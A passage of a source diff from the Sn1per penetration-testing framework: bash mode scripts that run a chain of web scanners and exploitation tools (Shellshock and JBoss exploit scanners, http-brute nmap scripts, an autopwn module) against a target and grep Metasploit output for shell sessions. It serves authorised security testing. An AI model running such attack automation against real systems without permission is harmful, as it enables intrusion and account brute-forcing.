echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cmsmap http://$TARGET:${PORT} | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}a.txt
echo ""
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}b.txt
echo ""
fi
if [[ "$WPSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$WP_API_KEY" ]]; then
wpscan --url http://$TARGET:${PORT} --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw
echo ""
wpscan --url http://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw
echo ""
else
wpscan --url http://$TARGET:${PORT} --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw
echo ""
wpscan --url http://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw
fi
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.txt
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.txt
rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null
fi
if [[ "$NIKTO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nikto -h http://$TARGET:${PORT} -output $LOOT_DIR/web/nikto-$TARGET-http-port${PORT}.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port${PORT}.txt
fi
cd $INSTALL_DIR
if [[ "$CLUSTERD" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
clusterd -i $TARGET -p ${PORT} 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http-port${PORT}.txt
fi
if [[ "$SHOCKER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port ${PORT} | tee $LOOT_DIR/web/shocker-$TARGET-port${PORT}.txt
fi
if [[ "$JEXBOSS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd /tmp/
python3 /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:${PORT} | tee $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw > $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [[ "$SMUGGLER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u http://$TARGET:${PORT} | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt
fi
if [[ "$NUCLEI" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NUCLEI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nuclei -silent -t /root/nuclei-templates/ -c $THREADS -target http://$TARGET:${PORT} -o $LOOT_DIR/web/nuclei-http-${TARGET}-port${PORT}.txt
fi
SSL="false"
source $INSTALL_DIR/modes/web_autopwn.sh
source $INSTALL_DIR/modes/osint_stage_2.sh
fi
if [[ "$BURP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}"
echo ""
for a in {1..30};
do
echo -n "[-] SCAN #$a: "
curl -sI "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | grep HTTP | awk '{print $2}'
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
while [[ ${#BURP_STATUS} -gt "5" ]];
do
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
BURP_STATUS_FULL=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3)
echo "[i] STATUS: $BURP_STATUS_FULL"
sleep 15
done
done
echo "[+] VULNERABILITIES: "
echo "----------------------------------------------------------------"
for a in {1..30};
do
curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | jq '.issue_events[].issue | "[" + .severity + "] " + .name + " - " + .origin + .path' | sort -u | sed 's/\"//g' | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt
done
echo "[-] Done!"
fi
if [[ "$ZAP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[i] Scanning: http://$TARGET:$PORT/"
sudo python3 /usr/share/sniper/bin/zap-scan.py "http://$TARGET:$PORT/"
DATE=$(date +"%Y%m%d%H%M")
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html
cp -f $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-http.html 2> /dev/null
echo "[i] Scan complete."
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html"
fi
if [[ "$ARACHNI_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
DATE=$(date +"%Y%m%d%H%M")
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
unzip arachni.zip
cd $INSTALL_DIR
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="false"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
fi
source $INSTALL_DIR/modes/sc0pe.sh
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then
echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null
fi
VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null)
if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then
echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null
fi
SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
if [[ ${#SHELLED} -ge 5 ]]; then
echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi

462
modes/webporthttps.sh Normal file
View File

@@ -0,0 +1,462 @@
# WEBPORTHTTPS MODE #####################################################################################################
if [[ "$MODE" = "webporthttps" ]]; then
if [[ "$REPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://sn1persecurity.com"
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
echo -e ""
echo -e ""
echo -e " ; , "
echo -e " ,; '. "
echo -e " ;: :; "
echo -e " :: :: "
echo -e " :: :: "
echo -e " ': : "
echo -e " :. : "
echo -e " ;' :: :: ' "
echo -e " .' '; ;' '. "
echo -e " :: :; ;: :: "
echo -e " ; :;. ,;: :: "
echo -e " :; :;: ,;\" :: "
echo -e " ::. ':; ..,.; ;:' ,.;: "
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
echo -e " .:::.....'\"':::::::'\",...;::::;. "
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
echo -e " ::' ;::;:::;::.. :; "
echo -e " :: ,;:::::::::::;:.. :: "
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
echo -e " :. :: ::::::; ::::::: : ; "
echo -e " ; :: ::::::: ::::::: : ; "
echo -e " ' :: ::::::....:::::' ,: ' "
echo -e " ' :: :::::::::::::\" :: "
echo -e " :: ':::::::::\"' :: "
echo -e " ': \"\"\"\"\"\"\"' :: "
echo -e " :: ;: "
echo -e " ':; ;:\" "
echo -e " -hrr- '; ,;' "
echo -e " \"' '\" "
echo -e " ''''$RESET"
echo ""
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
port_https=$PORT
if [[ -z "$port_https" ]];
then
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R --insecure https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R -L --insecure https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R --insecure -X OPTIONS https://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
if [[ "$WEBTECH" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
webtech -u https://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https-port$PORT.txt
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET-$PORT.txt 2> /dev/null
if [[ "$WAFWOOF" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https-port443.txt 2> /dev/null
echo ""
fi
if [[ "$WHATWEB" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
whatweb -a 3 https://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw 2> /dev/null
echo ""
fi
if [[ "$WIG" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/wig/wig.py -d -q https://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-https-$PORT
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https-$PORT > $LOOT_DIR/web/wig-$TARGET-https-$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/wig-$TARGET-https-$PORT 2> /dev/null
fi
if [[ "$SSL" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
sslscan --no-failed $TARGET:$PORT | tee $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw > $LOOT_DIR/web/sslscan-$TARGET-$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw 2> /dev/null
echo ""
fi
if [[ "$SSL_INSECURE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR INSECURE SSL/TLS CONFIGURATIONS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl https://$TARGET:$PORT 2> $LOOT_DIR/web/curldebug-$TARGET-$PORT.txt > /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ $CUTYCAPT = "1" ]]; then
if [[ $DISTRO == "blackarch" ]]; then
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [[ $WEBSCREENSHOT = "1" ]]; then
cd $LOOT_DIR
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium https://$TARGET:$PORT
fi
if [[ "$BURP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$VERBOSE" == "1" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}"
echo ""
fi
if [[ "$NMAP_SCRIPTS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -Pn -p $PORT -sV -v --script-timeout 90 --script=http-auth-finder,http-auth,http-brute,/usr/share/nmap/scripts/vulners,http-default-accounts $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
fi
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
